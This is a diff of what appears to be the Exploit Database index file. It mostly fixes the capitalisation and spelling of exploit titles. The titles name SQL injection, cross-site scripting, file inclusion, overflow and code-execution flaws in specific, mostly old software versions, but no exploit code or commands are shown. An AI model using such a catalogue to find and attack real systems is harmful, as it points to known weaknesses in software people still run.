+25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 +25663,platforms/php/webapps/25663.txt,"Shop-Script - categoryId SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 25664,platforms/php/webapps/25664.txt,"Shop-Script - ProductID SQL Injection",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 25665,platforms/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module - Directory Traversal",2005-05-16,pokley,php,webapps,0 25666,platforms/cgi/webapps/25666.txt,"PServ 3.2 - Source Code Disclosure",2005-05-16,"Claus R. F. Overbeck",cgi,webapps,0 @@ -22817,8 +22818,8 @@ id,file,description,date,author,platform,type,port 25678,platforms/php/webapps/25678.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal_mitgraf.php year Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 25679,platforms/php/webapps/25679.txt,"JGS-Portal 3.0.1/3.0.2 - jgs_portal_sponsor.php id Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 25680,platforms/windows/dos/25680.txt,"War Times - Remote Game Server Denial of Service",2005-05-17,"Luigi Auriemma",windows,dos,0 -25681,platforms/php/webapps/25681.php,"FusionPHP Fusion News 3.3/3.6 - X-ForwordedFor PHP Script Code Injection",2005-05-24,"Network security team",php,webapps,0 -25682,platforms/php/webapps/25682.txt,"Wordpress 1.5 - post.php Cross-Site Scripting",2005-05-17,"Thomas Waldegger",php,webapps,0 +25681,platforms/php/webapps/25681.php,"Fusionphp Fusion News 3.3/3.6 - X-ForwordedFor PHP Script Code Injection",2005-05-24,"Network security team",php,webapps,0 +25682,platforms/php/webapps/25682.txt,"WordPress 1.5 - post.php Cross-Site Scripting",2005-05-17,"Thomas Waldegger",php,webapps,0 25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",hardware,remote,0 25685,platforms/jsp/webapps/25685.txt,"Sun JavaMail 1.3 - API MimeMessage Infromation Disclosure",2005-05-19,"Ricky Latt",jsp,webapps,0 @@ -22853,14 +22854,14 @@ id,file,description,date,author,platform,type,port 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx Remote Code Execution",2013-05-26,rgod,windows,remote,0 25714,platforms/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack Based Overflow",2013-05-26,LiquidWorm,windows,dos,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 -25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - (index.php module parameter) Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 +25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - (index.php module Parameter) Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0 25718,platforms/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,hardware,local,0 25719,platforms/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,windows,dos,0 -25721,platforms/php/webapps/25721.txt,"Wordpress User Role Editor Plugin 3.12 - Cross-Site Request Forgery",2013-05-26,"Henry Hoggard",php,webapps,0 -25723,platforms/php/webapps/25723.txt,"Wordpress Spider Event Calendar Plugin 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 -25724,platforms/php/webapps/25724.txt,"Wordpress Spider Catalog Plugin 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 +25721,platforms/php/webapps/25721.txt,"WordPress User Role Editor Plugin 3.12 - Cross-Site Request Forgery",2013-05-26,"Henry Hoggard",php,webapps,0 +25723,platforms/php/webapps/25723.txt,"WordPress Spider Event Calendar Plugin 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 +25724,platforms/php/webapps/25724.txt,"WordPress Spider Catalog Plugin 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 25725,platforms/windows/local/25725.rb,"AdobeCollabSync - Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-26,Metasploit,windows,local,0 -25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - (menager.php playlist_id parameter) SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 +25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 - (menager.php playlist_id Parameter) SQL Injection",2013-05-26,Rooster(XEKA),php,webapps,0 25727,platforms/php/webapps/25727.txt,"BookReview 1.0 - add_review.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25728,platforms/php/webapps/25728.txt,"BookReview 1.0 - add_contents.htm Multiple Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 25729,platforms/php/webapps/25729.txt,"BookReview 1.0 - suggest_category.htm node Parameter Cross-Site Scripting",2005-05-26,Lostmon,php,webapps,0 @@ -22889,7 +22890,7 @@ id,file,description,date,author,platform,type,port 25752,platforms/php/dos/25752.txt,"PHPMailer 1.7 - Data() Function Remote Denial of Service",2005-05-28,"Mariano Nunez Di Croce",php,dos,0 25753,platforms/asp/webapps/25753.txt,"Hosting Controller 6.1 - resellerresources.asp jresourceid Parameter SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps,0 25754,platforms/asp/webapps/25754.txt,"Hosting Controller 6.1 - plandetails.asp Information Disclosure",2005-05-28,"GrayHatz Security Group",asp,webapps,0 -25755,platforms/windows/remote/25755.txt,"serverscheck 5.9/5.10 - Directory Traversal",2005-05-30,rgod,windows,remote,0 +25755,platforms/windows/remote/25755.txt,"ServersCheck 5.9/5.10 - Directory Traversal",2005-05-30,rgod,windows,remote,0 25756,platforms/php/webapps/25756.txt,"India Software Solution Shopping Cart - SQL Injection",2005-05-28,Rayden,php,webapps,0 25757,platforms/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 - Remote Denial of Service",2005-05-28,"Luigi Auriemma",multiple,dos,0 25758,platforms/asp/webapps/25758.txt,"Hosting Controller 6.1 - User Profile Unauthorized Access",2005-05-30,"GrayHatz Security Group",asp,webapps,0 @@ -22912,8 +22913,8 @@ id,file,description,date,author,platform,type,port 33411,platforms/php/webapps/33411.txt,"iSupport 1.8 - ticket_function.php Multiple Parameter Cross-Site Scripting",2009-12-16,"Stink and Essandre",php,webapps,0 33412,platforms/php/webapps/33412.txt,"iSupport 1.8 - 'index.php' which Parameter Cross-Site Scripting",2009-12-16,"Stink and Essandre",php,webapps,0 33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 - 'core/admin/auth.php' Cross-Site Scripting",2009-12-17,Metropolis,php,webapps,0 -33414,platforms/php/remote/33414.php,"PHP 5.2.11 - 'htmlspecialcharacters()' Malformed Multibyte Character Cross-Site Scripting (1)",2009-12-17,hello@iwamot.com,php,remote,0 -33415,platforms/php/remote/33415.php,"PHP 5.2.11 - 'htmlspecialcharacters()' Malformed Multibyte Character Cross-Site Scripting (2)",2009-12-17,hello@iwamot.com,php,remote,0 +33414,platforms/php/remote/33414.php,"PHP 5.2.11 - 'htmlspecialCharacters()' Malformed Multibyte Character Cross-Site Scripting (1)",2009-12-17,hello@iwamot.com,php,remote,0 +33415,platforms/php/remote/33415.php,"PHP 5.2.11 - 'htmlspecialCharacters()' Malformed Multibyte Character Cross-Site Scripting (2)",2009-12-17,hello@iwamot.com,php,remote,0 33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Parameter Local File Inclusion",2009-12-17,"Juan Galiana Lara",php,webapps,0 33417,platforms/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component - 'secid' Parameter SQL Injection",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 @@ -22956,8 +22957,8 @@ id,file,description,date,author,platform,type,port 25806,platforms/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"James Bercegay",php,webapps,0 25807,platforms/aix/dos/25807.txt,"IBM AIX 5.x - Invscout Local Buffer Overflow",2005-06-09,"Computer Academic Underground",aix,dos,0 25808,platforms/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"James Bercegay",php,webapps,0 -25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (Mac OSX) - Crash (PoC)",2013-05-29,ariarat,osx,dos,0 -25810,platforms/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Travesal Exploit",2013-05-29,"Adam Simuntis",hardware,webapps,0 +25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (OS X) - Crash (PoC)",2013-05-29,ariarat,osx,dos,0 +25810,platforms/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Traversal Exploit",2013-05-29,"Adam Simuntis",hardware,webapps,0 25811,platforms/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,hardware,webapps,0 25812,platforms/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 @@ -22971,7 +22972,7 @@ id,file,description,date,author,platform,type,port 25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - inbox/index.php view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - tile.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - subscribe_forum.php us Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - directory.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - Directory.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution",2013-05-30,xis_one,windows,remote,0 25837,platforms/linux/dos/25837.txt,"Monkey HTTPD 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",linux,dos,0 @@ -22982,11 +22983,11 @@ id,file,description,date,author,platform,type,port 25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 25843,platforms/asp/webapps/25843.txt,"Ublog Reload 1.0.5 - index.asp Multiple Parameter SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 25844,platforms/asp/webapps/25844.txt,"Ublog Reload 1.0.5 - blog_comment.asp y Parameter SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 -25845,platforms/asp/webapps/25845.txt,"Uapplication Ublog Reload 1.0.5 - Trackback.asp Cross-Site Scripting",2005-06-20,"Dedi Dwianto",asp,webapps,0 +25845,platforms/asp/webapps/25845.txt,"UApplication Ublog Reload 1.0.5 - Trackback.asp Cross-Site Scripting",2005-06-20,"Dedi Dwianto",asp,webapps,0 25846,platforms/php/webapps/25846.txt,"cPanel 9.1 - User Parameter Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart - 'login.asp' SQL Injection",2003-12-07,G00db0y,asp,webapps,0 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 - Database Unauthorized Access",2005-06-20,james,php,webapps,0 -25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation (newvalue) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 +25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File manipulation (newvalue) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts - Arbitrary Remote Command Execution Vulnerabilities",2005-08-21,sullo@cirt.net,cgi,webapps,0 26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 - Perldiver.cgi Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps,0 26291,platforms/asp/webapps/26291.txt,"Mall23 - AddItem.asp SQL Injection",2005-08-21,SmOk3,asp,webapps,0 @@ -23038,18 +23039,18 @@ id,file,description,date,author,platform,type,port 25894,platforms/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - in.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25895,platforms/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - enter.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25896,platforms/solaris/local/25896.pl,"Sun Solaris 10 Traceroute - Multiple Local Buffer Overflow Vulnerabilities",2005-06-24,"Przemyslaw Frasunek",solaris,local,0 -25897,platforms/php/webapps/25897.txt,"UBBCentral UBB.threads 5.5.1/6.x - download.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25898,platforms/php/webapps/25898.txt,"UBBCentral UBB.threads 5.5.1/6.x - calendar.php Multiple Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25899,platforms/php/webapps/25899.txt,"UBBCentral UBB.threads 5.5.1/6.x - modifypost.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25900,platforms/php/webapps/25900.txt,"UBBCentral UBB.threads 5.5.1/6.x - viewmessage.php message Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25901,platforms/php/webapps/25901.txt,"UBBCentral UBB.threads 5.5.1/6.x - addfav.php main Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25902,platforms/php/webapps/25902.txt,"UBBCentral UBB.threads 5.5.1/6.x - notifymod.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25903,platforms/php/webapps/25903.txt,"UBBCentral UBB.threads 5.5.1/6.x - grabnext.php posted Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25897,platforms/php/webapps/25897.txt,"UBBCentral UBB.Threads 5.5.1/6.x - download.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25898,platforms/php/webapps/25898.txt,"UBBCentral UBB.Threads 5.5.1/6.x - calendar.php Multiple Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25899,platforms/php/webapps/25899.txt,"UBBCentral UBB.Threads 5.5.1/6.x - modifypost.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25900,platforms/php/webapps/25900.txt,"UBBCentral UBB.Threads 5.5.1/6.x - viewmessage.php message Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25901,platforms/php/webapps/25901.txt,"UBBCentral UBB.Threads 5.5.1/6.x - addfav.php main Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25902,platforms/php/webapps/25902.txt,"UBBCentral UBB.Threads 5.5.1/6.x - notifymod.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25903,platforms/php/webapps/25903.txt,"UBBCentral UBB.Threads 5.5.1/6.x - grabnext.php posted Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25904,platforms/php/webapps/25904.c,"K-COLLECT CSV_DB.CGI 1.0/i_DB.CGI 1.0 - Remote Command Execution",2005-06-24,blahplok,php,webapps,0 25905,platforms/asp/webapps/25905.txt,"ASPNuke 0.80 - forgot_password.asp email Parameter Cross-Site Scripting",2005-06-27,"Alberto Trivero",asp,webapps,0 25906,platforms/asp/webapps/25906.txt,"ASPNuke 0.80 - register.asp Multiple Parameter Cross-Site Scripting",2005-06-27,"Alberto Trivero",asp,webapps,0 25907,platforms/asp/webapps/25907.txt,"ASPNuke 0.80 - Language_Select.asp HTTP Response Splitting",2005-06-27,"Alberto Trivero",asp,webapps,0 -25908,platforms/asp/webapps/25908.txt,"ASPPlayground.NET 3.2 SR1 - Arbitrary File Upload",2005-06-27,Psycho,asp,webapps,0 +25908,platforms/asp/webapps/25908.txt,"ASPPlayGround.NET 3.2 SR1 - Arbitrary File Upload",2005-06-27,Psycho,asp,webapps,0 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 - IP Parameter HTML Injection",2005-06-27,Megabyte,php,webapps,0 25910,platforms/asp/webapps/25910.txt,"Community Server Forums - 'SearchResults.aspx' Cross-Site Scripting",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0 25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service",2005-06-28,fRoGGz,windows,dos,0 @@ -23066,7 +23067,7 @@ id,file,description,date,author,platform,type,port 25921,platforms/windows/dos/25921.txt,"Raven Software Soldier Of Fortune 2 - Ignore Command Remote Denial of Service",2005-06-29,"Luigi Auriemma",windows,dos,0 25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 - 20review.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 - 10expand.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 -25926,platforms/php/webapps/25926.txt,"OSTicket 1.2/1.3 - view.php inc Variable Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 +25926,platforms/php/webapps/25926.txt,"osTicket 1.2/1.3 - view.php inc Variable Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 25924,platforms/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal",2005-06-30,ActualMInd,asp,webapps,0 25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 - 10browse.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25928,platforms/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - calendar.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 @@ -23074,7 +23075,7 @@ id,file,description,date,author,platform,type,port 25930,platforms/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - header.inc.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25931,platforms/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x - datePicker.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25932,platforms/php/webapps/25932.txt,"EasyPHPCalendar 6.1.5/6.2.x - setupSQL.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 -25933,platforms/windows/remote/25933.txt,"slimserve httpd 1.0/1.1 - Directory Traversal",2001-03-04,se00020,windows,remote,0 +25933,platforms/windows/remote/25933.txt,"SlimServe httpd 1.0/1.1 - Directory Traversal",2001-03-04,se00020,windows,remote,0 25934,platforms/php/webapps/25934.txt,"Plague News System 0.7 - CID Parameter SQL Injection",2005-07-04,Easyex,php,webapps,0 25935,platforms/php/webapps/25935.txt,"Plague News System 0.7 - CID Parameter Cross-Site Scripting",2005-07-04,Easyex,php,webapps,0 25936,platforms/windows/dos/25936.pl,"PlanetDNS PlanetFileServer - Remote Buffer Overflow",2005-06-28,fRoGGz,windows,dos,0 @@ -23100,7 +23101,7 @@ id,file,description,date,author,platform,type,port 25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - SQL.CLS.php SQL Injection",2005-07-10,Defa,php,webapps,0 25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Include",2005-07-11,"skdaemon porra",php,webapps,0 25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - ppa_root_path File Include",2005-07-10,"skdaemon porra",php,webapps,0 -25961,platforms/windows/local/25961.c,"SoftiaCom WMailserver 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0 +25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0 25962,platforms/asp/dos/25962.xml,"Microsoft ASP.NET 1.0/1.1 - RPC/Encoded Remote Denial of Service",2005-07-12,"Bryan Sullivan",asp,dos,0 25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps,0 25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - Inc.login.php Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps,0 @@ -23109,11 +23110,11 @@ id,file,description,date,author,platform,type,port 25967,platforms/hardware/dos/25967.txt,"Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service",2005-07-12,"Jeff Fay",hardware,dos,0 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 -25970,platforms/linux/remote/25970.py,"Exim sender_address Parameter - Remote Code Execution Exploit",2013-06-05,eKKiM,linux,remote,0 -25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig parameter' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 +25970,platforms/linux/remote/25970.py,"Exim sender_address Parameter - Remote Code Execution",2013-06-05,eKKiM,linux,remote,0 +25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0 -25973,platforms/php/webapps/25973.txt,"RuubikCMS 1.1.1 - (tinybrowser.php folder parameter) Path Traversal",2013-06-05,expl0i13r,php,webapps,0 -25974,platforms/osx/dos/25974.txt,"Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 +25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 +25974,platforms/osx/dos/25974.txt,"Apple Mac OS X Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow Remote Code Execution",2013-06-05,Metasploit,linux,remote,5555 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 @@ -23135,11 +23136,11 @@ id,file,description,date,author,platform,type,port 25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0 25994,platforms/php/webapps/25994.txt,"osCommerce 2.2 - update.php Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0 25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 - Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",php,webapps,0 -25996,platforms/php/webapps/25996.txt,"RuubikCMS 1.1.1 - Persistent Cross-Site Scripting",2013-06-07,expl0i13r,php,webapps,0 +25996,platforms/php/webapps/25996.txt,"Ruubikcms 1.1.1 - Persistent Cross-Site Scripting",2013-06-07,expl0i13r,php,webapps,0 25997,platforms/php/webapps/25997.txt,"tForum b0.9 - member.php Cross-Site Scripting",2005-07-18,wannacut,php,webapps,0 25998,platforms/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,hardware,webapps,0 25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0 -26001,platforms/java/webapps/26001.txt,"Novell GroupWise 6.5 WebAccess - HTML Injection",2005-07-15,"Francisco Amato",java,webapps,0 +26001,platforms/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",java,webapps,0 26002,platforms/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x - XML File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26004,platforms/multiple/remote/26004.txt,"Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-19,"Alexander Kornbrust",multiple,remote,0 @@ -23160,8 +23161,8 @@ id,file,description,date,author,platform,type,port 26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0 26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 - Newsearch.php Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,php,webapps,0 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0 -26020,platforms/php/webapps/26020.txt,"Asn GuestBook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 -26021,platforms/php/webapps/26021.txt,"Asn GuestBook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 +26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 +26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ - Unauthorized Access",2005-07-25,d.is.evil,hardware,remote,0 26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion",2005-07-25,lwdz,php,webapps,0 26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal",2005-07-25,"Martin O'Neal",linux,remote,0 @@ -23174,8 +23175,8 @@ id,file,description,date,author,platform,type,port 26031,platforms/php/webapps/26031.txt,"VBZoom Forum 1.11 - show.php SQL Injection",2005-07-26,abducter_minds@yahoo.com,php,webapps,0 26032,platforms/windows/remote/26032.html,"SPI Dynamics WebInspect 5.0.196 - Cross Application Script Injection",2005-07-26,QQLan@yandex.ru,windows,remote,0 26033,platforms/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 - viewcart.asp Cross-Site Scripting",2005-07-26,Zinho,asp,webapps,0 -26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - guestbook.php Cross-Site Scripting",2005-07-26,rgod,php,webapps,0 -26035,platforms/windows/remote/26035.txt,"Advanced GuestBook 2.2/2.3 - User-Agent HTML Injection",2005-01-22,Carbonize,windows,remote,0 +26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - Guestbook.php Cross-Site Scripting",2005-07-26,rgod,php,webapps,0 +26035,platforms/windows/remote/26035.txt,"Advanced Guestbook 2.2/2.3 - User-Agent HTML Injection",2005-01-22,Carbonize,windows,remote,0 26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0 26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - results.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - categorysearch.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0 @@ -23206,7 +23207,7 @@ id,file,description,date,author,platform,type,port 26063,platforms/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 - Lost_password.php Cross-Site Scripting",2005-08-02,"John Cobb",php,webapps,0 26064,platforms/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 - Shop_Display_Products.php SQL Injection",2005-08-02,"John Cobb",php,webapps,0 26065,platforms/cfm/webapps/26065.txt,"Fusebox 4.1 - index.cfm Cross-Site Scripting",2005-08-03,N.N.P,cfm,webapps,0 -26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 - .KS File Arbitrary Python Command Execution",2005-07-31,"Radovan Garabík",cgi,webapps,0 +26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 - '.KS' File Arbitrary Python Command Execution",2005-07-31,"Radovan 